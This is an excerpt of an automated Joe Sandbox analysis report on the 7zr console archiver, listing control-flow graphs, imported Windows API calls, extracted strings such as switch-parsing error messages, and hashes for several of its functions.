554->577 578 3bac23-3bac2a 554->578 559 3b9e5a-3b9e6f call 3bb650 555->559 556->552 561 3b9c4c-3b9c52 557->561 562 3b9c54 557->562 575 3b9e7b-3b9e7e call 3821d8 559->575 576 3b9e71-3b9e79 559->576 568 3b9c56-3b9c69 561->568 562->568 568->556 568->557 586 3b9e83-3b9f06 call 3bbde4 fputs call 381fa0 575->586 576->586 581 3b9f41-3b9f9d call 3bb650 call 3bb5e9 call 3bbde4 fputs call 381fa0 577->581 582 3bac3a-3bac66 call 3bb96d call 381e40 call 3a3247 578->582 583 3bac2c-3bac33 578->583 657 3b9f9f 581->657 618 3bac68-3bac6a 582->618 619 3bac6e-3bacb5 call 381e40 call 3811c2 call 3bbe0c call 3b2db9 582->619 583->582 588 3bac35 call 3bb988 583->588 586->554 586->559 588->582 597 3b9cb9-3b9cbc call 38315e 595->597 598 3b9cc1-3b9cdd call 3831e5 595->598 616 3b9d4b-3b9d53 596->616 617 3b9d2a-3b9d4a fputs call 3821d8 596->617 597->598 612 3b9cdf-3b9d00 call 383221 call 3831e5 call 381089 598->612 613 3b9d05-3b9d0e 598->613 612->613 613->595 613->596 623 3b9d59-3b9d5d 616->623 624 3b9dff-3b9e1f call 381fa0 call 381e40 616->624 617->616 618->619 630 3b9d5f-3b9d6d fputs 623->630 631 3b9d6e-3b9d82 623->631 624->541 624->542 630->631 638 3b9df0-3b9df9 631->638 639 3b9d84-3b9d88 631->639 638->623 638->624 645 3b9d8a-3b9d94 639->645 646 3b9d95-3b9d9f 639->646 645->646 654 3b9da1-3b9da3 646->654 655 3b9da5-3b9db1 646->655 654->655 656 3b9dd8-3b9dee 654->656 658 3b9db8 655->658 659 3b9db3-3b9db6 655->659 656->638 656->639 657->578 663 3b9dbb-3b9dce 658->663 659->663 670 3b9dd0-3b9dd3 663->670 671 3b9dd5 663->671 670->656 671->656
                        APIs
                          • Part of subcall function 003BB5B1: fputs.MSVCRT ref: 003BB5CA
                          • Part of subcall function 003BB5B1: fputs.MSVCRT ref: 003BB5E1
                        • GetStdHandle.KERNEL32(000000F5,?,?,?,?,?,?,?), ref: 003B99BD
                        • GetConsoleScreenBufferInfo.KERNELBASE(00000000,?,?,?,?,?,?), ref: 003B99C4
                        • _CxxThrowException.MSVCRT(?,004355B8), ref: 003B9A77
                        • _CxxThrowException.MSVCRT(?,004355B8), ref: 003B9ABB
                          • Part of subcall function 00381FB3: __EH_prolog.LIBCMT ref: 00381FB8
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: ExceptionThrowfputs$BufferConsoleH_prologHandleInfoScreen
                        • String ID: $ || $Codecs:$Formats:$Hashers:$KSNFMGOPBELHXCc+a+m+r+$P$offset=$p&D$p&D$N
                        • API String ID: 377453556-2857641154
                        • Opcode ID: 20377720fbca0f5ee6d2618d29f5d14a89bf0e56e0231814385267f42e81860e
                        • Instruction ID: 511c012df39b0ef92f997caa0a96cfd38faec75b6e6b9ac26d9b598bb9504c11
                        • Opcode Fuzzy Hash: 20377720fbca0f5ee6d2618d29f5d14a89bf0e56e0231814385267f42e81860e
                        • Instruction Fuzzy Hash: 9E229231D00208DFDF16EFA4D885BEDBBB1EF48304F60409AE645AB291CB749A85CF65

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 672 391ade-391b14 call 41fb10 call 3813f5 677 391b32-391b8b _fileno _isatty _fileno _isatty _fileno _isatty 672->677 678 391b16-391b2d call 3a1d73 _CxxThrowException 672->678 680 391b9d-391b9f 677->680 681 391b8d-391b91 677->681 678->677 684 391ba0-391bcd 680->684 681->680 683 391b93-391b97 681->683 683->680 685 391b99-391b9b 683->685 686 391bf9-391c12 684->686 687 391bcf-391bf8 call 391ea4 call 3827bb call 381e40 684->687 685->684 689 391c20 686->689 690 391c14-391c18 686->690 687->686 693 391c27-391c2b 689->693 690->689 692 391c1a-391c1e 690->692 692->689 692->693 695 391c2d 693->695 696 391c34-391c3e 693->696 695->696 698 391c49-391c53 696->698 699 391c40-391c43 696->699 701 391c5e-391c68 698->701 702 391c55-391c58 698->702 699->698 703 391c6a-391c6d 701->703 704 391c73-391c79 701->704 702->701 703->704 706 391cc9-391cd2 704->706 707 391c7b-391c87 704->707 710 391cea call 391eb9 706->710 711 391cd4-391ce6 706->711 708 391c89-391c93 707->708 709 391c95-391ca1 call 391ed1 707->709 708->706 718 391cc0-391cc3 709->718 719 391ca3-391cbb call 3a1d73 _CxxThrowException 709->719 714 391cef-391cf8 710->714 711->710 716 391cfa-391d0a 714->716 717 391d37-391d40 714->717 720 391d10 716->720 721 391dc2-391dd4 wcscmp 716->721 723 391e93-391ea1 717->723 724 391d46-391d52 717->724 718->706 719->718 725 391d17-391d1f call 389399 720->725 721->725 727 391dda-391de6 call 391ed1 721->727 724->723 728 391d58-391d93 call 3826dd call 38280c call 383221 call 383bbf 724->728 725->717 736 391d21-391d32 call 406a60 call 389313 725->736 727->725 737 391dec-391e04 call 3a1d73 _CxxThrowException 727->737 756 391d9f-391da3 728->756 757 391d95-391d9c 728->757 736->717 744 391e09-391e0c 737->744 747 391e0e 744->747 748 391e31-391e4a call 391f0c GetCurrentProcess SetProcessAffinityMask 744->748 751 391e10-391e12 747->751 752 391e14-391e2c call 3a1d73 _CxxThrowException 747->752 761 391e4c-391e82 GetLastError call 383221 call 3858a9 call 3831e5 call 381e40 748->761 762 391e83-391e92 call 383172 call 381e40 748->762 751->748 751->752 752->748 756->744 760 391da5-391dbd call 3a1d73 _CxxThrowException 756->760 757->756 760->721 761->762 762->723
                        APIs
                        • __EH_prolog.LIBCMT ref: 00391AE3
                          • Part of subcall function 003813F5: __EH_prolog.LIBCMT ref: 003813FA
                        • _CxxThrowException.MSVCRT(?,00436010), ref: 00391B2D
                        • _fileno.MSVCRT ref: 00391B3E
                        • _isatty.MSVCRT ref: 00391B47
                        • _fileno.MSVCRT ref: 00391B5D
                        • _isatty.MSVCRT ref: 00391B60
                        • _fileno.MSVCRT ref: 00391B73
                        • _CxxThrowException.MSVCRT(?,00436010), ref: 00391CBB
                        • _CxxThrowException.MSVCRT(?,00436010), ref: 00391DBD
                        • wcscmp.MSVCRT ref: 00391DCA
                        • _CxxThrowException.MSVCRT(?,00436010), ref: 00391E04
                        • _isatty.MSVCRT ref: 00391B76
                          • Part of subcall function 003A1D73: __EH_prolog.LIBCMT ref: 003A1D78
                        • _CxxThrowException.MSVCRT(?,00436010), ref: 00391E2C
                        • GetCurrentProcess.KERNEL32(00000000,00000000,?,Set process affinity mask: ,?), ref: 00391E3B
                        • SetProcessAffinityMask.KERNEL32(00000000), ref: 00391E42
                        • GetLastError.KERNEL32(?,Set process affinity mask: ,?), ref: 00391E4C
                        Strings
                        • unsupported value -stm, xrefs: 00391E19
                        • SeLockMemoryPrivilege, xrefs: 00391D28
                        • Unsupported switch postfix -bb, xrefs: 00391CA8
                        • Unsupported switch postfix for -slp, xrefs: 00391DF1
                        • : ERROR : , xrefs: 00391E52
                        • Unsupported switch postfix -stm, xrefs: 00391DAA
                        • Set process affinity mask: , xrefs: 00391D74
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: ExceptionThrow$H_prolog_fileno_isatty$Process$AffinityCurrentErrorLastMaskwcscmp
                        • String ID: : ERROR : $SeLockMemoryPrivilege$Set process affinity mask: $Unsupported switch postfix -bb$Unsupported switch postfix -stm$Unsupported switch postfix for -slp$unsupported value -stm
                        • API String ID: 1826148334-1115009270
                        • Opcode ID: 78eced6ca08ad315bb3b478c040c2cb198ba68dacbbef5145f0c75a5c7209b4e
                        • Instruction ID: 2f3af4f8770179c681b63fc37e473c14c1be19f0c387f531733aeaa65973cbdd
                        • Opcode Fuzzy Hash: 78eced6ca08ad315bb3b478c040c2cb198ba68dacbbef5145f0c75a5c7209b4e
                        • Instruction Fuzzy Hash: E9C1E431A003469FDF22EFB4C889BEDBBF5AF09304F158499E495A7292C774AD45CB14

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 777 3b8012-3b8032 call 41fb10 780 3b8038-3b806c fputs call 3b8341 777->780 781 3b8285 777->781 785 3b80c8-3b80cd 780->785 786 3b806e-3b8071 780->786 782 3b8287-3b8295 781->782 787 3b80cf-3b80d4 785->787 788 3b80d6-3b80df 785->788 789 3b808b-3b808d 786->789 790 3b8073-3b8089 fputs call 381fa0 786->790 791 3b80e2-3b8110 call 3b8341 call 3b8622 787->791 788->791 793 3b808f-3b8094 789->793 794 3b8096-3b809f 789->794 790->785 805 3b811e-3b812f call 3b8565 791->805 806 3b8112-3b8119 call 3b831f 791->806 797 3b80a2-3b80c7 call 382e47 call 3b85c6 call 381e40 793->797 794->797 797->785 805->782 812 3b8135-3b813f 805->812 806->805 813 3b814d-3b815b 812->813 814 3b8141-3b8148 call 3b82bb 812->814 813->782 817 3b8161-3b8164 813->817 814->813 818 3b81b6-3b81c0 817->818 819 3b8166-3b8186 817->819 820 3b8276-3b827f 818->820 821 3b81c6-3b81e1 fputs 818->821 824 3b8298-3b829d 819->824 825 3b818c-3b8196 call 3b8565 819->825 820->780 820->781 821->820 826 3b81e7-3b81fb 821->826 827 3b82b1-3b82b9 SysFreeString 824->827 831 3b819b-3b819d 825->831 829 3b81fd-3b821f 826->829 830 3b8273 826->830 827->782 834 3b829f-3b82a1 829->834 835 3b8221-3b8245 829->835 830->820 831->824 832 3b81a3-3b81b4 SysFreeString 831->832 832->818 832->819 836 3b82ae 834->836 838 3b82a3-3b82ab call 38965d 835->838 839 3b8247-3b8271 call 3b84a7 call 38965d SysFreeString 835->839 836->827 838->836 839->829 839->830
                        APIs
                        • __EH_prolog.LIBCMT ref: 003B8017
                        • fputs.MSVCRT ref: 003B804D
                          • Part of subcall function 003B8341: __EH_prolog.LIBCMT ref: 003B8346
                          • Part of subcall function 003B8341: fputs.MSVCRT ref: 003B835B
                          • Part of subcall function 003B8341: fputs.MSVCRT ref: 003B8364
                        • fputs.MSVCRT ref: 003B807A
                          • Part of subcall function 00381FA0: fputc.MSVCRT ref: 00381FA7
                          • Part of subcall function 0038965D: VariantClear.OLEAUT32(?), ref: 0038967F
                        • SysFreeString.OLEAUT32(00000000), ref: 003B81AA
                        • fputs.MSVCRT ref: 003B81CD
                        • SysFreeString.OLEAUT32(00000000), ref: 003B8267
                        • SysFreeString.OLEAUT32(00000000), ref: 003B82B1
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: fputs$FreeString$H_prolog$ClearVariantfputc
                        • String ID: --$----$Path$Type$Warning: The archive is open with offset
                        • API String ID: 2889736305-3797937567
                        • Opcode ID: 3174950ad0d4de100a822468dbf3919b1793fcc01dc623586925043901ab414b
                        • Instruction ID: b97188e8058b69dea3c17ba0f5ab64b1d811cb89b24939dca56a6e8280b9ceab
                        • Opcode Fuzzy Hash: 3174950ad0d4de100a822468dbf3919b1793fcc01dc623586925043901ab414b
                        • Instruction Fuzzy Hash: FE918F31A00605EFCB16DFA4DD81AEEB7B9FF48314F104529E612AB691DF30AD05CB50

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 846 3b6766-3b6792 call 41fb10 EnterCriticalSection 849 3b67af-3b67b7 846->849 850 3b6794-3b6799 call 3bc7d7 846->850 852 3b67b9 call 381f91 849->852 853 3b67be-3b67c3 849->853 854 3b679e-3b67ac 850->854 852->853 856 3b67c9-3b67d5 853->856 857 3b6892-3b68a8 853->857 854->849 858 3b6817-3b682f 856->858 859 3b67d7-3b67dd 856->859 860 3b68ae-3b68b4 857->860 861 3b6941 857->861 863 3b6873-3b687b 858->863 864 3b6831-3b6842 call 381fa0 858->864 859->858 866 3b67df-3b67eb 859->866 860->861 862 3b68ba-3b68c2 860->862 865 3b6943-3b695a 861->865 867 3b6933-3b693f call 3bc5cd 862->867 868 3b68c4-3b68e6 call 381fa0 fputs 862->868 863->867 870 3b6881-3b6887 863->870 864->863 882 3b6844-3b686c fputs call 382201 864->882 871 3b67ed 866->871 872 3b67f3-3b6801 866->872 867->865 884 3b68fb-3b6917 call 394f2a call 381fb3 call 381e40 868->884 885 3b68e8-3b68f9 fputs 868->885 870->867 878 3b688d 870->878 871->872 872->863 874 3b6803-3b6815 fputs 872->874 880 3b686e call 381fa0 874->880 883 3b692e call 381f91 878->883 880->863 882->880 883->867 889 3b691c-3b6928 call 381fa0 884->889 885->889 889->883
                        APIs
                        • __EH_prolog.LIBCMT ref: 003B676B
                        • EnterCriticalSection.KERNEL32(00442938), ref: 003B6781
                        • fputs.MSVCRT ref: 003B680B
                        • LeaveCriticalSection.KERNEL32(00442938), ref: 003B6944
                          • Part of subcall function 003BC7D7: fputs.MSVCRT ref: 003BC840
                        • fputs.MSVCRT ref: 003B6851
                          • Part of subcall function 00382201: fputs.MSVCRT ref: 0038221E
                        • fputs.MSVCRT ref: 003B68D9
                        • fputs.MSVCRT ref: 003B68F6
                          • Part of subcall function 00381FA0: fputc.MSVCRT ref: 00381FA7
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: fputs$CriticalSection$EnterH_prologLeavefputc
                        • String ID: v$8)D$8)D$Sub items Errors:
                        • API String ID: 2670240366-315136708
                        • Opcode ID: a28f9327dd48a47c45636793b17a021803ca730777762ebab148470cc8b2f9d4
                        • Instruction ID: 9d9f462202712b5889153508db4ce49bd7f7d80cc99e08c417b3853d4124460b
                        • Opcode Fuzzy Hash: a28f9327dd48a47c45636793b17a021803ca730777762ebab148470cc8b2f9d4
                        • Instruction Fuzzy Hash: 5051B031600700CFC726AF64D892AEAB7E1FF84318F55456EE29A8B662CB347C45CF54

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 898 3b6359-3b6373 call 41fb10 901 3b639e-3b63af call 3b5a4d 898->901 902 3b6375-3b6385 call 3bc7d7 898->902 908 3b65ee-3b65f1 901->908 909 3b63b5-3b63cd 901->909 902->901 907 3b6387-3b639b 902->907 907->901 910 3b65f3-3b65fb 908->910 911 3b6624-3b663c 908->911 912 3b63cf 909->912 913 3b63d2-3b63d4 909->913 918 3b66ea call 3bc5cd 910->918 919 3b6601-3b6607 call 3b8012 910->919 914 3b663e call 381f91 911->914 915 3b6643-3b664b 911->915 912->913 916 3b63df-3b63e7 913->916 917 3b63d6-3b63d9 913->917 914->915 915->918 922 3b6651-3b668f fputs call 38211a call 381fa0 call 3b8685 915->922 923 3b63e9-3b63f2 call 381fa0 916->923 924 3b6411-3b6413 916->924 917->916 921 3b64b1-3b64bc call 3b6700 917->921 929 3b66ef-3b66fd 918->929 932 3b660c-3b660e 919->932 942 3b64be-3b64c1 921->942 943 3b64c7-3b64cf 921->943 922->929 986 3b6691-3b6697 922->986 923->924 947 3b63f4-3b640c call 38210c call 381fa0 923->947 930 3b6442-3b6446 924->930 931 3b6415-3b641d 924->931 934 3b6448-3b6450 930->934 935 3b6497-3b649f 930->935 938 3b642a-3b643b 931->938 939 3b641f-3b6425 call 3b6134 931->939 932->929 940 3b6614-3b661f call 381fa0 932->940 944 3b647f-3b6490 934->944 945 3b6452-3b647a fputs call 381fa0 call 381fb3 call 381fa0 934->945 935->921 948 3b64a1-3b64ac call 381fa0 call 381f91 935->948 938->930 939->938 940->918 942->943 951 3b65a2-3b65a6 942->951 952 3b64f9-3b64fb 943->952 953 3b64d1-3b64da call 381fa0 943->953 944->935 945->944 947->924 948->921 966 3b65da-3b65e6 951->966 967 3b65a8-3b65b6 951->967 963 3b652a-3b652e 952->963 964 3b64fd-3b6505 952->964 953->952 983 3b64dc-3b64f4 call 38210c call 381fa0 953->983 976 3b657f-3b6587 963->976 977 3b6530-3b6538 963->977 973 3b6512-3b6523 964->973 974 3b6507-3b650d call 3b6134 964->974 966->909 970 3b65ec 966->970 978 3b65b8-3b65ca call 3b6244 967->978 979 3b65d3 967->979 970->908 973->963 974->973 976->951 985 3b6589-3b6595 call 381fa0 976->985 980 3b653a-3b6562 fputs call 381fa0 call 381fb3 call 381fa0 977->980 981 3b6567-3b6578 977->981 978->979 996 3b65cc-3b65ce call 381f91 978->996 979->966 980->981 981->976 983->952 985->951 1005 3b6597-3b659d call 381f91 985->1005 993 3b6699-3b669f 986->993 994 3b66df-3b66e5 call 381f91 986->994 1000 3b66b3-3b66ce call 394f2a call 381fb3 call 381e40 993->1000 1001 3b66a1-3b66b1 fputs 993->1001 994->918 996->979 1006 3b66d3-3b66da call 381fa0 1000->1006 1001->1006 1005->951 1006->994
                        APIs
                        • __EH_prolog.LIBCMT ref: 003B635E
                        • fputs.MSVCRT ref: 003B645F
                          • Part of subcall function 003BC7D7: fputs.MSVCRT ref: 003BC840
                        • fputs.MSVCRT ref: 003B6547
                        • fputs.MSVCRT ref: 003B665F
                        • fputs.MSVCRT ref: 003B66AE
                          • Part of subcall function 00381F91: fflush.MSVCRT ref: 00381F93
                          • Part of subcall function 00381FB3: __EH_prolog.LIBCMT ref: 00381FB8
                          • Part of subcall function 00381E40: free.MSVCRT ref: 00381E44
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: fputs$H_prolog$fflushfree
                        • String ID: Can't allocate required memory$ERRORS:$WARNINGS:
                        • API String ID: 1750297421-1898165966
                        • Opcode ID: 445f804b888a0abbe3c7919925fedb847c1138e1296094ebdd5745c585a25408
                        • Instruction ID: e975e036e9abe40ff541013cb160604ee9c40fc5b9e4443831585046f700fb00
                        • Opcode Fuzzy Hash: 445f804b888a0abbe3c7919925fedb847c1138e1296094ebdd5745c585a25408
                        • Instruction Fuzzy Hash: 4EB18E306017058FDB26EF60C9A2BEAB7F5BF44308F14456DE65A4BA92CB38AC45CF50

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1016 389c8f-389cc2 GetModuleHandleA GetProcAddress 1017 389cef-389d06 GlobalMemoryStatus 1016->1017 1018 389cc4-389ccc GlobalMemoryStatusEx 1016->1018 1019 389d08 1017->1019 1020 389d0b-389d0d 1017->1020 1018->1017 1021 389cce-389cd7 1018->1021 1019->1020 1022 389d11-389d15 1020->1022 1023 389cd9 1021->1023 1024 389ce5 1021->1024 1025 389cdb-389cde 1023->1025 1026 389ce0-389ce3 1023->1026 1027 389ce8-389ced 1024->1027 1025->1024 1025->1026 1026->1027 1027->1022
                        APIs
                        • GetModuleHandleA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx), ref: 00389CB3
                        • GetProcAddress.KERNEL32(00000000), ref: 00389CBA
                        • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 00389CC8
                        • GlobalMemoryStatus.KERNEL32(?), ref: 00389CFA
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: GlobalMemoryStatus$AddressHandleModuleProc
                        • String ID: $@$GlobalMemoryStatusEx$kernel32.dll
                        • API String ID: 180289352-802862622
                        • Opcode ID: 743523dd1e6958c68ccd33f1322795ad2679b6592dd73566a13ce9e59ed292b6
                        • Instruction ID: 8d850109a8981e26fc35f76058d7376a422815b9743eea25cffdfe8876d0d61b
                        • Opcode Fuzzy Hash: 743523dd1e6958c68ccd33f1322795ad2679b6592dd73566a13ce9e59ed292b6
                        • Instruction Fuzzy Hash: D9115770A003199FCF20EFA4D889BADBBF8BF04305F54046AE442A7240D778E984CF58

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1028 3cf1b2-3cf1ce call 41fb10 call 391168 1032 3cf1d3-3cf1d5 1028->1032 1033 3cf36a-3cf378 1032->1033 1034 3cf1db-3cf1e4 call 3cf3e4 1032->1034 1037 3cf1ed-3cf1f2 1034->1037 1038 3cf1e6-3cf1e8 1034->1038 1039 3cf1f4-3cf1f9 1037->1039 1040 3cf203-3cf21a 1037->1040 1038->1033 1039->1040 1041 3cf1fb-3cf1fe 1039->1041 1043 3cf21c-3cf22c _CxxThrowException 1040->1043 1044 3cf231-3cf248 memcpy 1040->1044 1041->1033 1043->1044 1045 3cf24c-3cf257 1044->1045 1046 3cf25c-3cf25e 1045->1046 1047 3cf259 1045->1047 1048 3cf260-3cf26f 1046->1048 1049 3cf281-3cf299 1046->1049 1047->1046 1050 3cf279-3cf27b 1048->1050 1051 3cf271 1048->1051 1057 3cf29b-3cf2a0 1049->1057 1058 3cf311-3cf313 1049->1058 1050->1049 1052 3cf315-3cf318 1050->1052 1054 3cf277 1051->1054 1055 3cf273-3cf275 1051->1055 1056 3cf357-3cf368 1052->1056 1054->1050 1055->1050 1055->1054 1056->1033 1057->1052 1059 3cf2a2-3cf2b5 call 3cf37b 1057->1059 1058->1056 1063 3cf2b7-3cf2cf call 41e1a0 1059->1063 1064 3cf2f0-3cf30c memmove 1059->1064 1067 3cf31a-3cf355 memcpy 1063->1067 1068 3cf2d1-3cf2eb call 3cf37b 1063->1068 1064->1045 1067->1056 1068->1063 1072 3cf2ed 1068->1072 1072->1064
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: H_prolog
                        • String ID: CC$CC
                        • API String ID: 3519838083-1103270740
                        • Opcode ID: eb8d74be413f342a4e4cd2294fe6716ba20ed6e85a1c10132d94cc460f93c23c
                        • Instruction ID: 4892267fa0d83175ba934c27f9813cfc516a0bd38b3ffddb5244ecabc48dfd7c
                        • Opcode Fuzzy Hash: eb8d74be413f342a4e4cd2294fe6716ba20ed6e85a1c10132d94cc460f93c23c
                        • Instruction Fuzzy Hash: F7516D7AA00205AFDB15DFA4C885FBEB3B6FB88354F15842DE901EB241D774AD458BA0

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: _initterm$__getmainargs__p___initenv__p__commode__p__fmode__set_app_type
                        • String ID:
                        • API String ID: 4012487245-0
                        • Opcode ID: afe222468bacc24816421aab5757409ac6fa8f523be2c097ea83de0d7a79ed56
                        • Instruction ID: 7b86c23a242b6e901b314f66d639445a547d2371daf13adef071efc8f59929be
                        • Opcode Fuzzy Hash: afe222468bacc24816421aab5757409ac6fa8f523be2c097ea83de0d7a79ed56
                        • Instruction Fuzzy Hash: 26214275600704EFDB109FA4EC46BAD7BB4FB0E724F50022AF511A22E2C7B85441CF68

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_10_2_380000_7zr.jbxd
                        Similarity
                        • API ID: _initterm$FilterXcpt__getmainargs__p___initenv__setusermatherr_controlfpexit
                        • String ID:
                        • API String ID: 279829931-0
                        • Opcode ID: 412540a660cc56d2b1ca4563a931639fde11960f226783379122d75dfd236417
                        • Instruction ID: 1e9bd29fbef1f3f5647eb41cef97d2f68e6268610d33ad9075f3dda40cff06ef
                        • Opcode Fuzzy Hash: 412540a660cc56d2b1ca4563a931639fde11960f226783379122d75dfd236417
                        • Instruction Fuzzy Hash: 72012D75A10208AFEF149FA0EC46DED77B9FF0D704B50001AF601B6262DA799411CF28

                        Control-flow Graph

                        APIs
                        • __EH_prolog.LIBCMT ref: 003A185D
                          • Part of subcall function 003A021A: __EH_prolog.LIBCMT ref: 003A021F
                          • Part of subcall function 003A062E: __EH_prolog.LIBCMT ref: 003A0633
                        • _CxxThrowException.MSVCRT(?,00436010), ref: 003A1961
                          • Part of subcall function 003A1AA5: __EH_prolog.LIBCMT ref: 003A1AAA
                        Strings
                        • Duplicate archive path:, xrefs: 003A1A8D
                        Memory Dump Source
                        • Source File: 0000000A.00000002.1797893519.0000000000381000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00380000, based on PE: true
                        • Associated: 0000000A.00000002.1797876164.0000000000380000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1797977969.000000000042C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798000566.0000000000442000.00000004.00000001.01000000.0000000A.sdmpDownload File
                        • Associated: 0000000A.00000002.1798023526.000000000044B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                        Joe Sandbox IDA Plugin
